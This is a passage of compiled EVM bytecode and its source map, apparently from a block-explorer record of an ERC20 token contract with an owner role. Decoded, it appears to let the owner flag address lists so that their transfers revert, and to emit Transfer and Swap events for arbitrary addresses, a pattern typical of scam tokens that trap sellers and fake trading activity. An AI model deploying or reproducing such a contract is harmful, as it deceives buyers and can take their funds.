a0e91906118ad565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822600086866000604051610a729493929190611c9a565b60405180910390a3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610ac657610ac5611b36565b5b9050602002016020810190610adb91906118ad565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610b209190611756565b60405180910390a38080610b3390611b94565b9150506109db565b505050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b7b90611b05565b80601f0160208091040260200160405190810160405280929190818152602001828054610ba790611b05565b8015610bf45780601f10610bc957610100808354040283529160200191610bf4565b820191906000526020600020905b815481529060010190602001808311610bd757829003601f168201915b5050505050905090565b600080610c09610e62565b90506000610c178286610d02565b905083811015610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390611d51565b60405180910390fd5b610c698286868403610e6a565b60019250505092915050565b600080610c80610e62565b9050610c8d81858561113d565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cf59190611756565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d91611033565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df790611de3565b60405180910390fd5b610e09816114b3565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ed9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed090611e75565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3f90611f07565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110269190611756565b60405180910390a3505050565b61103b610e62565b73ffffffffffffffffffffffffffffffffffffffff16611059610b43565b73ffffffffffffffffffffffffffffffffffffffff16146110af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a690611f73565b60405180910390fd5b565b60006110bd8484610d02565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111375781811015611129576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112090611fdf565b60405180910390fd5b6111368484848403610e6a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a390612071565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361121b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121290612103565b60405180910390fd5b611226838383611577565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156112ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a490612195565b60405180910390fd5b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061134e5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156113aa5760011515600560009054906101000a900460ff161515146113a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113a0906121db565b60405180910390fd5b5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161149a9190611756565b60405180910390a36114ad84848461157c565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156115bb5780820151818401526020810190506115a0565b60008484015250505050565b6000601f19601f8301169050919050565b60006115e382611581565b6115ed818561158c565b93506115fd81856020860161159d565b611606816115c7565b840191505092915050565b6000602082019050818103600083015261162b81846115d8565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116688261163d565b9050919050565b6116788161165d565b811461168357600080fd5b50565b6000813590506116958161166f565b92915050565b6000819050919050565b6116ae8161169b565b81146116b957600080fd5b50565b6000813590506116cb816116a5565b92915050565b600080604083850312156116e8576116e7611633565b5b60006116f685828601611686565b9250506020611707858286016116bc565b9150509250929050565b60008115159050919050565b61172681611711565b82525050565b6000602082019050611741600083018461171d565b92915050565b6117508161169b565b82525050565b600060208201905061176b6000830184611747565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261179657611795611771565b5b8235905067ffffffffffffffff8111156117b3576117b2611776565b5b6020830191508360208202830111156117cf576117ce61177b565b5b9250929050565b600080602083850312156117ed576117ec611633565b5b600083013567ffffffffffffffff81111561180b5761180a611638565b5b61181785828601611780565b92509250509250929050565b60008060006060848603121561183c5761183b611633565b5b600061184a86828701611686565b935050602061185b86828701611686565b925050604061186c868287016116bc565b9150509250925092565b600060ff82169050919050565b61188c81611876565b82525050565b60006020820190506118a76000830184611883565b92915050565b6000602082840312156118c3576118c2611633565b5b60006118d184828501611686565b91505092915050565b6000806000806000608086880312156118f6576118f5611633565b5b600061190488828901611686565b955050602086013567ffffffffffffffff81111561192557611924611638565b5b61193188828901611780565b94509450506040611944888289016116bc565b9250506060611955888289016116bc565b9150509295509295909350565b60008083601f84011261197857611977611771565b5b8235905067ffffffffffffffff81111561199557611994611776565b5b6020830191508360208202830111156119b1576119b061177b565b5b9250929050565b600080600080600080606087890312156119d5576119d4611633565b5b600087013567ffffffffffffffff8111156119f3576119f2611638565b5b6119ff89828a01611780565b9650965050602087013567ffffffffffffffff811115611a2257611a21611638565b5b611a2e89828a01611780565b9450945050604087013567ffffffffffffffff811115611a5157611a50611638565b5b611a5d89828a01611962565b92509250509295509295509295565b611a758161165d565b82525050565b6000602082019050611a906000830184611a6c565b92915050565b60008060408385031215611aad57611aac611633565b5b6000611abb85828601611686565b9250506020611acc85828601611686565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1d57607f821691505b602082108103611b3057611b2f611ad6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611b9f8261169b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611bd157611bd0611b65565b5b600182019050919050565b6000611be78261169b565b9150611bf28361169b565b9250828201905080821115611c0a57611c09611b65565b5b92915050565b6000819050919050565b6000819050919050565b6000611c3f611c3a611c3584611c10565b611c1a565b61169b565b9050919050565b611c4f81611c24565b82525050565b6000608082019050611c6a6000830187611747565b611c776020830186611c46565b611c846040830185611c46565b611c916060830184611747565b95945050505050565b6000608082019050611caf6000830187611c46565b611cbc6020830186611747565b611cc96040830185611747565b611cd66060830184611c46565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d3b60258361158c565b9150611d4682611cdf565b604082019050919050565b60006020820190508181036000830152611d6a81611d2e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611dcd60268361158c565b9150611dd882611d71565b604082019050919050565b60006020820190508181036000830152611dfc81611dc0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611e5f60248361158c565b9150611e6a82611e03565b604082019050919050565b60006020820190508181036000830152611e8e81611e52565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ef160228361158c565b9150611efc82611e95565b604082019050919050565b60006020820190508181036000830152611f2081611ee4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611f5d60208361158c565b9150611f6882611f27565b602082019050919050565b60006020820190508181036000830152611f8c81611f50565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611fc9601d8361158c565b9150611fd482611f93565b602082019050919050565b60006020820190508181036000830152611ff881611fbc565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061205b60258361158c565b915061206682611fff565b604082019050919050565b6000602082019050818103600083015261208a8161204e565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120ed60238361158c565b91506120f882612091565b604082019050919050565b6000602082019050818103600083015261211c816120e0565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061217f60268361158c565b915061218a82612123565b604082019050919050565b600060208201905081810360008301526121ae81612172565b9050919050565b50565b60006121c560008361158c565b91506121d0826121b5565b600082019050919050565b600060208201905081810360008301526121f4816121b8565b905091905056fea2646970667358221220d3bddf394fa4d65c97455e9df2d41166362c4f60ebccf8b5e67328a9878c499264736f6c63430008130033

Deployed Bytecode Sourcemap

40005:168:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25414:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27763:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26532:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37190:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;28544:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26376:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;38724:103;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29248:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37391:205;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;38089:309;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;26703:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37848:233;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22530:103;;;:::i;:::-;;38406:310;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21889:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25633:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29989:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27036:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37721:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;27292:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22788:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;37604:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25414:100;25468:13;25501:5;25494:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25414:100;:::o;27763:201::-;27846:4;27863:13;27879:12;:10;:12::i;:::-;27863:28;;27902:32;27911:5;27918:7;27927:6;27902:8;:32::i;:::-;27952:4;27945:11;;;27763:201;;;;:::o;26532:108::-;26593:7;26620:12;;26613:19;;26532:108;:::o;37190:193::-;21775:13;:11;:13::i;:::-;37274:9:::1;37269:107;37293:11;;:18;;37289:1;:22;37269:107;;;37360:4;37333:8;:24;37342:11;;37354:1;37342:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;37333:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;37313:3;;;;;:::i;:::-;;;;37269:107;;;;37190:193:::0;;:::o;28544:295::-;28675:4;28692:15;28710:12;:10;:12::i;:::-;28692:30;;28733:38;28749:4;28755:7;28764:6;28733:15;:38::i;:::-;28782:27;28792:4;28798:2;28802:6;28782:9;:27::i;:::-;28827:4;28820:11;;;28544:295;;;;;:::o;26376:93::-;26434:5;26459:2;26452:9;;26376:93;:::o;38724:103::-;21775:13;:11;:13::i;:::-;38812:7:::1;38798:11;;:21;;;;;;;;;;;;;;;;;;38724:103:::0;:::o;29248:238::-;29336:4;29353:13;29369:12;:10;:12::i;:::-;29353:28;;29392:64;29401:5;29408:7;29445:10;29417:25;29427:5;29434:7;29417:9;:25::i;:::-;:38;;;;:::i;:::-;29392:8;:64::i;:::-;29474:4;29467:11;;;29248:238;;;;:::o;37391:205::-;21775:13;:11;:13::i;:::-;37486:9:::1;37481:108;37505:11;;:18;;37501:1;:22;37481:108;;;37572:5;37545:8;:24;37554:11;;37566:1;37554:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;37545:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;37525:3;;;;;:::i;:::-;;;;37481:108;;;;37391:205:::0;;:::o;38089:309::-;38207:9;38202:189;38226:11;;:18;;38222:1;:22;38202:189;;;38301:11;;38313:1;38301:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;38271:45;;38276:6;38271:45;;;38284:3;38289:1;38292;38295:4;38271:45;;;;;;;;;:::i;:::-;;;;;;;;38358:11;;38370:1;38358:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;38336:43;;38345:11;;;;;;;;;;;38336:43;;;38374:4;38336:43;;;;;;:::i;:::-;;;;;;;;38246:3;;;;;:::i;:::-;;;;38202:189;;;;38089:309;;;;;:::o;26703:127::-;26777:7;26804:9;:18;26814:7;26804:18;;;;;;;;;;;;;;;;26797:25;;26703:127;;;:::o;37848:233::-;37969:9;37964:110;37988:5;;:12;;37984:1;:16;37964:110;;;38046:3;;38050:1;38046:6;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;38027:35;;38036:5;;38042:1;38036:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;38027:35;;;38054:4;;38059:1;38054:7;;;;;;;:::i;:::-;;;;;;;;38027:35;;;;;;:::i;:::-;;;;;;;;38002:3;;;;;:::i;:::-;;;;37964:110;;;;37848:233;;;;;;:::o;22530:103::-;21775:13;:11;:13::i;:::-;22595:30:::1;22622:1;22595:18;:30::i;:::-;22530:103::o:0;38406:310::-;38526:9;38521:188;38545:11;;:18;;38541:1;:22;38521:188;;;38620:11;;38632:1;38620:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;38590:45;;38595:6;38590:45;;;38603:1;38606:3;38611:4;38617:1;38590:45;;;;;;;;;:::i;:::-;;;;;;;;38680:11;;;;;;;;;;;38655:42;;38664:11;;38676:1;38664:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;38655:42;;;38693:3;38655:42;;;;;;:::i;:::-;;;;;;;;38565:3;;;;;:::i;:::-;;;;38521:188;;;;38406:310;;;;;:::o;21889:87::-;21935:7;21962:6;;;;;;;;;;;21955:13;;21889:87;:::o;25633:104::-;25689:13;25722:7;25715:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;25633:104;:::o;29989:436::-;30082:4;30099:13;30115:12;:10;:12::i;:::-;30099:28;;30138:24;30165:25;30175:5;30182:7;30165:9;:25::i;:::-;30138:52;;30229:15;30209:16;:35;;30201:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;30322:60;30331:5;30338:7;30366:15;30347:16;:34;30322:8;:60::i;:::-;30413:4;30406:11;;;;29989:436;;;;:::o;27036:193::-;27115:4;27132:13;27148:12;:10;:12::i;:::-;27132:28;;27171;27181:5;27188:2;27192:6;27171:9;:28::i;:::-;27217:4;27210:11;;;27036:193;;;;:::o;37721:119::-;37822:3;37806:26;;37815:5;37806:26;;;37827:4;37806:26;;;;;;:::i;:::-;;;;;;;;37721:119;;;:::o;27292:151::-;27381:7;27408:11;:18;27420:5;27408:18;;;;;;;;;;;;;;;:27;27427:7;27408:27;;;;;;;;;;;;;;;;27401:34;;27292:151;;;;:::o;22788:201::-;21775:13;:11;:13::i;:::-;22897:1:::1;22877:22;;:8;:22;;::::0;22869:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;22953:28;22972:8;22953:18;:28::i;:::-;22788:201:::0;:::o;37604:109::-;37662:4;37686:8;:19;37695:9;37686:19;;;;;;;;;;;;;;;;;;;;;;;;;37679:26;;37604:109;;;:::o;20598:98::-;20651:7;20678:10;20671:17;;20598:98;:::o;34442:380::-;34595:1;34578:19;;:5;:19;;;34570:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;34676:1;34657:21;;:7;:21;;;34649:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;34760:6;34730:11;:18;34742:5;34730:18;;;;;;;;;;;;;;;:27;34749:7;34730:27;;;;;;;;;;;;;;;:36;;;;34798:7;34782:32;;34791:5;34782:32;;;34807:6;34782:32;;;;;;:::i;:::-;;;;;;;;34442:380;;;:::o;22054:132::-;22129:12;:10;:12::i;:::-;22118:23;;:7;:5;:7::i;:::-;:23;;;22110:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;22054:132::o;35113:453::-;35248:24;35275:25;35285:5;35292:7;35275:9;:25::i;:::-;35248:52;;35335:17;35315:16;:37;35311:248;;35397:6;35377:16;:26;;35369:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;35481:51;35490:5;35497:7;35525:6;35506:16;:25;35481:8;:51::i;:::-;35311:248;35237:329;35113:453;;;:::o;30895:923::-;31042:1;31026:18;;:4;:18;;;31018:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;31119:1;31105:16;;:2;:16;;;31097:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;31174:38;31195:4;31201:2;31205:6;31174:20;:38::i;:::-;31225:19;31247:9;:15;31257:4;31247:15;;;;;;;;;;;;;;;;31225:37;;31296:6;31281:11;:21;;31273:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;31360:8;:14;31369:4;31360:14;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;31378:8;:12;31387:2;31378:12;;;;;;;;;;;;;;;;;;;;;;;;;31360:30;31356:72;;;31419:4;31400:23;;:15;;;;;;;;;;;:23;;;31392:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;31356:72;31496:6;31482:11;:20;31464:9;:15;31474:4;31464:15;;;;;;;;;;;;;;;:38;;;;31699:6;31682:9;:13;31692:2;31682:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;31749:2;31734:26;;31743:4;31734:26;;;31753:6;31734:26;;;;;;:::i;:::-;;;;;;;;31773:37;31793:4;31799:2;31803:6;31773:19;:37::i;:::-;31007:811;30895:923;;;:::o;23149:191::-;23223:16;23242:6;;;;;;;;;;;23223:25;;23268:8;23259:6;;:17;;;;;;;;;;;;;;;;;;23323:8;23292:40;;23313:8;23292:40;;;;;;;;;;;;23212:128;23149:191;:::o;36898:125::-;;;;:::o;36170:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:117::-;3907:1;3904;3897:12;3921:117;4030:1;4027;4020:12;4044:117;4153:1;4150;4143:12;4184:568;4257:8;4267:6;4317:3;4310:4;4302:6;4298:17;4294:27;4284:122;;4325:79;;:::i;:::-;4284:122;4438:6;4425:20;4415:30;;4468:18;4460:6;4457:30;4454:117;;;4490:79;;:::i;:::-;4454:117;4604:4;4596:6;4592:17;4580:29;;4658:3;4650:4;4642:6;4638:17;4628:8;4624:32;4621:41;4618:128;;;4665:79;;:::i;:::-;4618:128;4184:568;;;;;:::o;4758:559::-;4844:6;4852;4901:2;4889:9;4880:7;4876:23;4872:32;4869:119;;;4907:79;;:::i;:::-;4869:119;5055:1;5044:9;5040:17;5027:31;5085:18;5077:6;5074:30;5071:117;;;5107:79;;:::i;:::-;5071:117;5220:80;5292:7;5283:6;5272:9;5268:22;5220:80;:::i;:::-;5202:98;;;;4998:312;4758:559;;;;;:::o;5323:619::-;5400:6;5408;5416;5465:2;5453:9;5444:7;5440:23;5436:32;5433:119;;;5471:79;;:::i;:::-;5433:119;5591:1;5616:53;5661:7;5652:6;5641:9;5637:22;5616:53;:::i;:::-;5606:63;;5562:117;5718:2;5744:53;5789:7;5780:6;5769:9;5765:22;5744:53;:::i;:::-;5734:63;;5689:118;5846:2;5872:53;5917:7;5908:6;5897:9;5893:22;5872:53;:::i;:::-;5862:63;;5817:118;5323:619;;;;;:::o;5948:86::-;5983:7;6023:4;6016:5;6012:16;6001:27;;5948:86;;;:::o;6040:112::-;6123:22;6139:5;6123:22;:::i;:::-;6118:3;6111:35;6040:112;;:::o;6158:214::-;6247:4;6285:2;6274:9;6270:18;6262:26;;6298:67;6362:1;6351:9;6347:17;6338:6;6298:67;:::i;:::-;6158:214;;;;:::o;6378:329::-;6437:6;6486:2;6474:9;6465:7;6461:23;6457:32;6454:119;;;6492:79;;:::i;:::-;6454:119;6612:1;6637:53;6682:7;6673:6;6662:9;6658:22;6637:53;:::i;:::-;6627:63;;6583:117;6378:329;;;;:::o;6713:995::-;6826:6;6834;6842;6850;6858;6907:3;6895:9;6886:7;6882:23;6878:33;6875:120;;;6914:79;;:::i;:::-;6875:120;7034:1;7059:53;7104:7;7095:6;7084:9;7080:22;7059:53;:::i;:::-;7049:63;;7005:117;7189:2;7178:9;7174:18;7161:32;7220:18;7212:6;7209:30;7206:117;;;7242:79;;:::i;:::-;7206:117;7355:80;7427:7;7418:6;7407:9;7403:22;7355:80;:::i;:::-;7337:98;;;;7132:313;7484:2;7510:53;7555:7;7546:6;7535:9;7531:22;7510:53;:::i;:::-;7500:63;;7455:118;7612:2;7638:53;7683:7;7674:6;7663:9;7659:22;7638:53;:::i;:::-;7628:63;;7583:118;6713:995;;;;;;;;:::o;7731:568::-;7804:8;7814:6;7864:3;7857:4;7849:6;7845:17;7841:27;7831:122;;7872:79;;:::i;:::-;7831:122;7985:6;7972:20;7962:30;;8015:18;8007:6;8004:30;8001:117;;;8037:79;;:::i;:::-;8001:117;8151:4;8143:6;8139:17;8127:29;;8205:3;8197:4;8189:6;8185:17;8175:8;8171:32;8168:41;8165:128;;;8212:79;;:::i;:::-;8165:128;7731:568;;;;;:::o;8305:1309::-;8463:6;8471;8479;8487;8495;8503;8552:2;8540:9;8531:7;8527:23;8523:32;8520:119;;;8558:79;;:::i;:::-;8520:119;8706:1;8695:9;8691:17;8678:31;8736:18;8728:6;8725:30;8722:117;;;8758:79;;:::i;:::-;8722:117;8871:80;8943:7;8934:6;8923:9;8919:22;8871:80;:::i;:::-;8853:98;;;;8649:312;9028:2;9017:9;9013:18;9000:32;9059:18;9051:6;9048:30;9045:117;;;9081:79;;:::i;:::-;9045:117;9194:80;9266:7;9257:6;9246:9;9242:22;9194:80;:::i;:::-;9176:98;;;;8971:313;9351:2;9340:9;9336:18;9323:32;9382:18;9374:6;9371:30;9368:117;;;9404:79;;:::i;:::-;9368:117;9517:80;9589:7;9580:6;9569:9;9565:22;9517:80;:::i;:::-;9499:98;;;;9294:313;8305:1309;;;;;;;;:::o;9620:118::-;9707:24;9725:5;9707:24;:::i;:::-;9702:3;9695:37;9620:118;;:::o;9744:222::-;9837:4;9875:2;9864:9;9860:18;9852:26;;9888:71;9956:1;9945:9;9941:17;9932:6;9888:71;:::i;:::-;9744:222;;;;:::o;9972:474::-;10040:6;10048;10097:2;10085:9;10076:7;10072:23;10068:32;10065:119;;;10103:79;;:::i;:::-;10065:119;10223:1;10248:53;10293:7;10284:6;10273:9;10269:22;10248:53;:::i;:::-;10238:63;;10194:117;10350:2;10376:53;10421:7;10412:6;10401:9;10397:22;10376:53;:::i;:::-;10366:63;;10321:118;9972:474;;;;;:::o;10452:180::-;10500:77;10497:1;10490:88;10597:4;10594:1;10587:15;10621:4;10618:1;10611:15;10638:320;10682:6;10719:1;10713:4;10709:12;10699:22;;10766:1;10760:4;10756:12;10787:18;10777:81;;10843:4;10835:6;10831:17;10821:27;;10777:81;10905:2;10897:6;10894:14;10874:18;10871:38;10868:84;;10924:18;;:::i;:::-;10868:84;10689:269;10638:320;;;:::o;10964:180::-;11012:77;11009:1;11002:88;11109:4;11106:1;11099:15;11133:4;11130:1;11123:15;11150:180;11198:77;11195:1;11188:88;11295:4;11292:1;11285:15;11319:4;11316:1;11309:15;11336:233;11375:3;11398:24;11416:5;11398:24;:::i;:::-;11389:33;;11444:66;11437:5;11434:77;11431:103;;11514:18;;:::i;:::-;11431:103;11561:1;11554:5;11550:13;11543:20;;11336:23